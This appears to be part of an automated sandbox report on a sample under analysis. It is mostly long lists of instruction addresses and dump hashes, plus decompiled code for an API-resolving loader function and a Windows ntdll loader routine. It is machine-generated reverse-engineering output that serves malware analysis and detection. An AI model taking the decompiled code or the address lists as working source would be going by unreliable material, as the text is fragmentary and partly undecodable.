                                                                                                    0x00406487
                                                                                                    0x0040648b
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406491
                                                                                                    0x00406493
                                                                                                    0x00406497
                                                                                                    0x00406497
                                                                                                    0x0040649a
                                                                                                    0x0040649e
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004064ee
                                                                                                    0x004064f2
                                                                                                    0x004064f9
                                                                                                    0x004064fc
                                                                                                    0x004064ff
                                                                                                    0x00406509
                                                                                                    0x00000000
                                                                                                    0x00406509
                                                                                                    0x004064f4
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406515
                                                                                                    0x00406519
                                                                                                    0x00406520
                                                                                                    0x00406523
                                                                                                    0x00406526
                                                                                                    0x0040651b
                                                                                                    0x0040651b
                                                                                                    0x0040651b
                                                                                                    0x00406529
                                                                                                    0x0040652c
                                                                                                    0x0040652f
                                                                                                    0x0040652f
                                                                                                    0x00406532
                                                                                                    0x00406535
                                                                                                    0x00406538
                                                                                                    0x00406538
                                                                                                    0x0040653b
                                                                                                    0x00406542
                                                                                                    0x00406547
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004065d5
                                                                                                    0x004065d5
                                                                                                    0x004065d9
                                                                                                    0x00406977
                                                                                                    0x00000000
                                                                                                    0x00406977
                                                                                                    0x004065df
                                                                                                    0x004065e2
                                                                                                    0x004065e5
                                                                                                    0x004065e9
                                                                                                    0x004065ec
                                                                                                    0x004065f2
                                                                                                    0x004065f4
                                                                                                    0x004065f4
                                                                                                    0x004065f4
                                                                                                    0x004065f7
                                                                                                    0x004065fa
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406658
                                                                                                    0x00406658
                                                                                                    0x0040665c
                                                                                                    0x00406983
                                                                                                    0x00000000
                                                                                                    0x00406983
                                                                                                    0x00406662
                                                                                                    0x00406665
                                                                                                    0x00406668
                                                                                                    0x0040666c
                                                                                                    0x0040666f
                                                                                                    0x00406675
                                                                                                    0x00406677
                                                                                                    0x00406677
                                                                                                    0x00406677
                                                                                                    0x0040667a
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406428
                                                                                                    0x00406428
                                                                                                    0x0040642b
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406767
                                                                                                    0x0040676b
                                                                                                    0x0040678d
                                                                                                    0x00406790
                                                                                                    0x0040679a
                                                                                                    0x00000000
                                                                                                    0x0040679a
                                                                                                    0x0040676d
                                                                                                    0x00406770
                                                                                                    0x00406774
                                                                                                    0x00406777
                                                                                                    0x00406777
                                                                                                    0x0040677a
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406824
                                                                                                    0x00406828
                                                                                                    0x00406846
                                                                                                    0x00406846
                                                                                                    0x00406846
                                                                                                    0x0040684d
                                                                                                    0x00406854
                                                                                                    0x0040685b
                                                                                                    0x0040685b
                                                                                                    0x00000000
                                                                                                    0x0040685b
                                                                                                    0x0040682a
                                                                                                    0x0040682d
                                                                                                    0x00406830
                                                                                                    0x00406833
                                                                                                    0x0040683a
                                                                                                    0x0040677e
                                                                                                    0x0040677e
                                                                                                    0x00406781
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406915
                                                                                                    0x00406918
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040654f
                                                                                                    0x00406551
                                                                                                    0x00406558
                                                                                                    0x00406559
                                                                                                    0x0040655b
                                                                                                    0x0040655e
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406566
                                                                                                    0x00406569
                                                                                                    0x0040656c
                                                                                                    0x0040656e
                                                                                                    0x00406570
                                                                                                    0x00406570
                                                                                                    0x00406571
                                                                                                    0x00406574
                                                                                                    0x0040657b
                                                                                                    0x0040657e
                                                                                                    0x0040658c
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406862
                                                                                                    0x00406862
                                                                                                    0x00406865
                                                                                                    0x0040686c
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406871
                                                                                                    0x00406871
                                                                                                    0x00406875
                                                                                                    0x004069ad
                                                                                                    0x00000000
                                                                                                    0x004069ad
                                                                                                    0x0040687b
                                                                                                    0x0040687e
                                                                                                    0x00406881
                                                                                                    0x00406885
                                                                                                    0x00406888
                                                                                                    0x0040688e
                                                                                                    0x00406890
                                                                                                    0x00406890
                                                                                                    0x00406890
                                                                                                    0x00406893
                                                                                                    0x00406896
                                                                                                    0x00406896
                                                                                                    0x00406896
                                                                                                    0x00406896
                                                                                                    0x00406899
                                                                                                    0x00406899
                                                                                                    0x0040689d
                                                                                                    0x004068fd
                                                                                                    0x00406900
                                                                                                    0x00406905
                                                                                                    0x00406906
                                                                                                    0x00406908
                                                                                                    0x0040690a
                                                                                                    0x0040690d
                                                                                                    0x00000000
                                                                                                    0x0040690d
                                                                                                    0x0040689f
                                                                                                    0x004068a5
                                                                                                    0x004068a8
                                                                                                    0x004068ab
                                                                                                    0x004068ae
                                                                                                    0x004068b1
                                                                                                    0x004068b4
                                                                                                    0x004068b7
                                                                                                    0x004068ba
                                                                                                    0x004068bd
                                                                                                    0x004068c0
                                                                                                    0x004068d9
                                                                                                    0x004068dc
                                                                                                    0x004068df
                                                                                                    0x004068e2
                                                                                                    0x004068e6
                                                                                                    0x004068e8
                                                                                                    0x004068e8
                                                                                                    0x004068e9
                                                                                                    0x004068ec
                                                                                                    0x004068c2
                                                                                                    0x004068c2
                                                                                                    0x004068ca
                                                                                                    0x004068cf
                                                                                                    0x004068d1
                                                                                                    0x004068d4
                                                                                                    0x004068d4
                                                                                                    0x004068ef
                                                                                                    0x004068f6
                                                                                                    0x00000000
                                                                                                    0x004068f8
                                                                                                    0x00000000
                                                                                                    0x004068f8
                                                                                                    0x00000000
                                                                                                    0x00406594
                                                                                                    0x00406597
                                                                                                    0x004065cd
                                                                                                    0x004066fd
                                                                                                    0x004066fd
                                                                                                    0x004066fd
                                                                                                    0x004066fd
                                                                                                    0x00406700
                                                                                                    0x00406700
                                                                                                    0x00406703
                                                                                                    0x00406705
                                                                                                    0x0040698f
                                                                                                    0x00000000
                                                                                                    0x0040698f
                                                                                                    0x0040670b
                                                                                                    0x0040670e
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406714
                                                                                                    0x00406718
                                                                                                    0x0040671b
                                                                                                    0x0040671b
                                                                                                    0x0040671b
                                                                                                    0x00000000
                                                                                                    0x0040671b
                                                                                                    0x00406599
                                                                                                    0x0040659b
                                                                                                    0x0040659d
                                                                                                    0x0040659f
                                                                                                    0x004065a2
                                                                                                    0x004065a3
                                                                                                    0x004065a5
                                                                                                    0x004065a7
                                                                                                    0x004065aa
                                                                                                    0x004065ad
                                                                                                    0x004065c3
                                                                                                    0x004065c8
                                                                                                    0x00406600
                                                                                                    0x00406600
                                                                                                    0x00406604
                                                                                                    0x00406630
                                                                                                    0x00406632
                                                                                                    0x00406639
                                                                                                    0x0040663c
                                                                                                    0x0040663f
                                                                                                    0x0040663f
                                                                                                    0x00406644
                                                                                                    0x00406644
                                                                                                    0x00406646
                                                                                                    0x00406649
                                                                                                    0x00406650
                                                                                                    0x00406653
                                                                                                    0x00406680
                                                                                                    0x00406680
                                                                                                    0x00406683
                                                                                                    0x00406686
                                                                                                    0x004066fa
                                                                                                    0x004066fa
                                                                                                    0x004066fa
                                                                                                    0x00000000
                                                                                                    0x004066fa
                                                                                                    0x00406688
                                                                                                    0x0040668e
                                                                                                    0x00406691
                                                                                                    0x00406694
                                                                                                    0x00406697
                                                                                                    0x0040669a
                                                                                                    0x0040669d
                                                                                                    0x004066a0
                                                                                                    0x004066a3
                                                                                                    0x004066a6
                                                                                                    0x004066a9
                                                                                                    0x004066c2
                                                                                                    0x004066c4
                                                                                                    0x004066c7
                                                                                                    0x004066c8
                                                                                                    0x004066cb
                                                                                                    0x004066cd
                                                                                                    0x004066d0
                                                                                                    0x004066d2
                                                                                                    0x004066d4
                                                                                                    0x004066d7
                                                                                                    0x004066d9
                                                                                                    0x004066dc
                                                                                                    0x004066e0
                                                                                                    0x004066e2
                                                                                                    0x004066e2
                                                                                                    0x004066e3
                                                                                                    0x004066e6
                                                                                                    0x004066e9
                                                                                                    0x004066ab
                                                                                                    0x004066ab
                                                                                                    0x004066b3
                                                                                                    0x004066b8
                                                                                                    0x004066ba
                                                                                                    0x004066bd
                                                                                                    0x004066bd
                                                                                                    0x004066ec
                                                                                                    0x004066f3
                                                                                                    0x0040667d
                                                                                                    0x0040667d
                                                                                                    0x0040667d
                                                                                                    0x0040667d
                                                                                                    0x00000000
                                                                                                    0x004066f5
                                                                                                    0x00000000
                                                                                                    0x004066f5
                                                                                                    0x004066f3
                                                                                                    0x00406606
                                                                                                    0x00406609
                                                                                                    0x0040660b
                                                                                                    0x0040660e
                                                                                                    0x00406611
                                                                                                    0x00406614
                                                                                                    0x00406616
                                                                                                    0x00406619
                                                                                                    0x0040661c
                                                                                                    0x0040661c
                                                                                                    0x0040661f
                                                                                                    0x0040661f
                                                                                                    0x00406622
                                                                                                    0x00406629
                                                                                                    0x004065fd
                                                                                                    0x004065fd
                                                                                                    0x004065fd
                                                                                                    0x004065fd
                                                                                                    0x00000000
                                                                                                    0x0040662b
                                                                                                    0x00000000
                                                                                                    0x0040662b
                                                                                                    0x00406629
                                                                                                    0x004065af
                                                                                                    0x004065b2
                                                                                                    0x004065b4
                                                                                                    0x004065b7
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004064a1
                                                                                                    0x004064a1
                                                                                                    0x004064a5
                                                                                                    0x0040696b
                                                                                                    0x00000000
                                                                                                    0x0040696b
                                                                                                    0x004064ab
                                                                                                    0x004064ae
                                                                                                    0x004064b1
                                                                                                    0x004064b4
                                                                                                    0x004064b6
                                                                                                    0x004064b6
                                                                                                    0x004064b6
                                                                                                    0x004064b9
                                                                                                    0x004064bc
                                                                                                    0x004064bf
                                                                                                    0x004064c2
                                                                                                    0x004064c5
                                                                                                    0x004064c8
                                                                                                    0x004064c9
                                                                                                    0x004064cb
                                                                                                    0x004064cb
                                                                                                    0x004064cb
                                                                                                    0x004064ce
                                                                                                    0x004064d1
                                                                                                    0x004064d4
                                                                                                    0x004064d7
                                                                                                    0x004064d7
                                                                                                    0x004064d7
                                                                                                    0x004064da
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040671e
                                                                                                    0x0040671e
                                                                                                    0x0040671e
                                                                                                    0x00406722
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406728
                                                                                                    0x0040672b
                                                                                                    0x0040672e
                                                                                                    0x00406731
                                                                                                    0x00406733
                                                                                                    0x00406733
                                                                                                    0x00406733
                                                                                                    0x00406736
                                                                                                    0x00406739
                                                                                                    0x0040673c
                                                                                                    0x0040673f
                                                                                                    0x00406742
                                                                                                    0x00406745
                                                                                                    0x00406746
                                                                                                    0x00406748
                                                                                                    0x00406748
                                                                                                    0x00406748
                                                                                                    0x0040674b
                                                                                                    0x0040674e
                                                                                                    0x00406751
                                                                                                    0x00406754
                                                                                                    0x00406757
                                                                                                    0x0040675b
                                                                                                    0x0040675d
                                                                                                    0x00406760
                                                                                                    0x00000000
                                                                                                    0x00406762
                                                                                                    0x00000000
                                                                                                    0x00406762
                                                                                                    0x00406760
                                                                                                    0x00406995
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00405fc4

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429792160.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429781321.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429813163.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429828354.0000000000409000.00000008.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429836549.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d33a5f9df5361017a2c2cd63e74982cac3414c6cd2676332625b738f25334a08
                                                                                                    • Instruction ID: 7fe690cacb8e5da35aefc448adc87e2f65dc6f56ff44dc44b78e187fa59068bd
                                                                                                    • Opcode Fuzzy Hash: d33a5f9df5361017a2c2cd63e74982cac3414c6cd2676332625b738f25334a08
                                                                                                    • Instruction Fuzzy Hash: 70F16871D00229CBDF28CFA8C8946ADBBB1FF44305F25816ED856BB281D7785A96CF44
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00405E88, Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E00405E88(signed int _a4) {
				struct HINSTANCE__* _t5;
				CHAR* _t7;
				signed int _t9;

				_t9 = _a4 << 3;
				_t7 =  *(_t9 + 0x409220);
				_t5 = GetModuleHandleA(_t7);
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t9 + 0x409224));
				}
				_t5 = LoadLibraryA(_t7);
				if(_t5 != 0) {
					goto L2;
				}
				return _t5;
			}






                                                                                                    0x00405e90
                                                                                                    0x00405e93
                                                                                                    0x00405e9a
                                                                                                    0x00405ea2
                                                                                                    0x00405eaf
                                                                                                    0x00000000
                                                                                                    0x00405eb6
                                                                                                    0x00405ea5
                                                                                                    0x00405ead
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00405ebe

                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(?,?,00000000,0040327F,00000008), ref: 00405E9A
                                                                                                    • LoadLibraryA.KERNEL32(?,?,00000000,0040327F,00000008), ref: 00405EA5
                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00405EB6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429792160.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429781321.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429813163.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429828354.0000000000409000.00000008.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429836549.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                    • String ID:
                                                                                                    • API String ID: 310444273-0
                                                                                                    • Opcode ID: cda0668070076e7cac62d6abfc32be1e4fdfe709f191786036c768239460f4b3
                                                                                                    • Instruction ID: 91087f9554edebef2dfdad95906e97f440013226b38390424b9c6ad62026e406
                                                                                                    • Opcode Fuzzy Hash: cda0668070076e7cac62d6abfc32be1e4fdfe709f191786036c768239460f4b3
                                                                                                    • Instruction Fuzzy Hash: 0FE08C32A08511BBD3115B30ED0896B77A8EA89B41304083EF959F6290D734EC119BFA
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00A98794, Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 83%
                                                                                                    			E00A98794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E00A9934A() != 0) {
								_t159 = E00B0A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0xb75780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E00B05510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0xb75780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E00A9849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E00A98999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E00A98999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0xb75c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0xb75c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E00AA2280(_t92, 0xb786cc);
															_t94 = E00B59DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E00AB61A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0xb75c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E00A98A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0xb75c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0xb75c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E00ACF380(_t136, 0xa61184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E00AA2280(_t108, 0xb786cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E00AB61A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E00B59D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E00A9FFB0(_t118, _t156, 0xb786cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E00AC9A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                                                                                    0x00a98799
                                                                                                    0x00a9879d
                                                                                                    0x00a987a1
                                                                                                    0x00a987a3
                                                                                                    0x00a987a8
                                                                                                    0x00a987c3
                                                                                                    0x00a987c3
                                                                                                    0x00a987c8
                                                                                                    0x00a987d1
                                                                                                    0x00a987d4
                                                                                                    0x00a987d8
                                                                                                    0x00a987e5
                                                                                                    0x00a987ec
                                                                                                    0x00ae9bfe
                                                                                                    0x00ae9c00
                                                                                                    0x00ae9c02
                                                                                                    0x00ae9c08
                                                                                                    0x00ae9c0d
                                                                                                    0x00ae9c0f
                                                                                                    0x00ae9c14
                                                                                                    0x00ae9c2d
                                                                                                    0x00ae9c32
                                                                                                    0x00ae9c37
                                                                                                    0x00ae9c3a
                                                                                                    0x00ae9c3c
                                                                                                    0x00ae9c42
                                                                                                    0x00ae9c42
                                                                                                    0x00ae9c3c
                                                                                                    0x00ae9c02
                                                                                                    0x00a987da
                                                                                                    0x00a987df
                                                                                                    0x00a987e3
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00a987e3
                                                                                                    0x00a987f2
                                                                                                    0x00000000
                                                                                                    0x00a987fb
                                                                                                    0x00a987fd
                                                                                                    0x00a987fe
                                                                                                    0x00a9880e
                                                                                                    0x00a9880f
                                                                                                    0x00a98810
                                                                                                    0x00a98814
                                                                                                    0x00a9881a
                                                                                                    0x00a9881c
                                                                                                    0x00a9881f
                                                                                                    0x00a98821
                                                                                                    0x00a98822
                                                                                                    0x00a98824
                                                                                                    0x00a98826
                                                                                                    0x00a9882c
                                                                                                    0x00a9882e
                                                                                                    0x00ae9c48
                                                                                                    0x00ae9c48
                                                                                                    0x00a98834
                                                                                                    0x00a98834
                                                                                                    0x00a98837
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00a98837
                                                                                                    0x00a9882e
                                                                                                    0x00a9883d
                                                                                                    0x00a98840
                                                                                                    0x00a98843
                                                                                                    0x00a98846
                                                                                                    0x00a98849
                                                                                                    0x00a9884c
                                                                                                    0x00a9884e
                                                                                                    0x00a98850
                                                                                                    0x00a98852
                                                                                                    0x00a98854
                                                                                                    0x00a98857
                                                                                                    0x00a988b4
                                                                                                    0x00a988b6
                                                                                                    0x00a988b6
                                                                                                    0x00a98859
                                                                                                    0x00a98859
                                                                                                    0x00a98859
                                                                                                    0x00a98861
                                                                                                    0x00a98866
                                                                                                    0x00a9886a
                                                                                                    0x00a9893d
                                                                                                    0x00a98941
                                                                                                    0x00000000
                                                                                                    0x00a98947
                                                                                                    0x00a98947
                                                                                                    0x00a9894a
                                                                                                    0x00a9894c
                                                                                                    0x00000000
                                                                                                    0x00a98952
                                                                                                    0x00a98955
                                                                                                    0x00a9895a
                                                                                                    0x00a9895d
                                                                                                    0x00a9895d
                                                                                                    0x00a9895f
                                                                                                    0x00a98961
                                                                                                    0x00a98961
                                                                                                    0x00a98968
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00a9896a
                                                                                                    0x00a9896b
                                                                                                    0x00a9896e
                                                                                                    0x00000000
                                                                                                    0x00a98970
                                                                                                    0x00a98970
                                                                                                    0x00a98970
                                                                                                    0x00a98970
                                                                                                    0x00a98972
                                                                                                    0x00a98972
                                                                                                    0x00a98974
                                                                                                    0x00000000
                                                                                                    0x00a9897a
                                                                                                    0x00a9897a
                                                                                                    0x00a9897d
                                                                                                    0x00000000
                                                                                                    0x00a98983
                                                                                                    0x00ae9c65
                                                                                                    0x00ae9c6d
                                                                                                    0x00ae9c72
                                                                                                    0x00ae9c75
                                                                                                    0x00ae9c75
                                                                                                    0x00ae9c82
                                                                                                    0x00ae9c86
                                                                                                    0x00ae9c87
                                                                                                    0x00ae9c88
                                                                                                    0x00ae9c89
                                                                                                    0x00ae9c8c
                                                                                                    0x00ae9c90
                                                                                                    0x00ae9c95
                                                                                                    0x00ae9c97
                                                                                                    0x00ae9ca0
                                                                                                    0x00ae9ca3
                                                                                                    0x00ae9ca9
                                                                                                    0x00ae9ca9
                                                                                                    0x00000000
                                                                                                    0x00ae9ca9
                                                                                                    0x00ae9ca3
                                                                                                    0x00000000
                                                                                                    0x00ae9c97
                                                                                                    0x00a9897d
                                                                                                    0x00000000
                                                                                                    0x00a98974
                                                                                                    0x00a98988
                                                                                                    0x00a98992
                                                                                                    0x00a98996
                                                                                                    0x00000000
                                                                                                    0x00a98996
                                                                                                    0x00a9894c
                                                                                                    0x00000000
                                                                                                    0x00a98870
                                                                                                    0x00a9887b
                                                                                                    0x00a9887d
                                                                                                    0x00a9887f
                                                                                                    0x00a98881
                                                                                                    0x00a98884
                                                                                                    0x00a98884
                                                                                                    0x00a98886
                                                                                                    0x00a98889
                                                                                                    0x00a9888c
                                                                                                    0x00a9888e
                                                                                                    0x00a98891
                                                                                                    0x00a98891
                                                                                                    0x00a98898
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00a9889a
                                                                                                    0x00a9889b
                                                                                                    0x00a9889e
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00a988a0
                                                                                                    0x00a988a8
                                                                                                    0x00a988b0
                                                                                                    0x00a988b2
                                                                                                    0x00a988d3
                                                                                                    0x00a988d5
                                                                                                    0x00000000
                                                                                                    0x00a988d7
                                                                                                    0x00a988db
                                                                                                    0x00a988dc
                                                                                                    0x00a988e0
                                                                                                    0x00a988e8
                                                                                                    0x00a988ee
                                                                                                    0x00a988f0
                                                                                                    0x00a988f3
                                                                                                    0x00a988fc
                                                                                                    0x00a98901
                                                                                                    0x00a98906
                                                                                                    0x00a9890c
                                                                                                    0x00a9890c
                                                                                                    0x00a9890f
                                                                                                    0x00a98916
                                                                                                    0x00a98917
                                                                                                    0x00a98918
                                                                                                    0x00a98919
                                                                                                    0x00a9891a
                                                                                                    0x00a9891f
                                                                                                    0x00a98921
                                                                                                    0x00ae9c52
                                                                                                    0x00ae9c55
                                                                                                    0x00ae9c5b
                                                                                                    0x00ae9cac
                                                                                                    0x00ae9cc0
                                                                                                    0x00ae9cc0
                                                                                                    0x00ae9c55
                                                                                                    0x00a98927
                                                                                                    0x00a98927
                                                                                                    0x00a9892f
                                                                                                    0x00a98933
                                                                                                    0x00000000
                                                                                                    0x00a988f5
                                                                                                    0x00a988f5
                                                                                                    0x00000000
                                                                                                    0x00a988f7
                                                                                                    0x00a988f7
                                                                                                    0x00a988fa
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00a988fa
                                                                                                    0x00a988f5
                                                                                                    0x00a988f3
                                                                                                    0x00000000
                                                                                                    0x00a988d5
                                                                                                    0x00000000
                                                                                                    0x00a988b2
                                                                                                    0x00a988c9
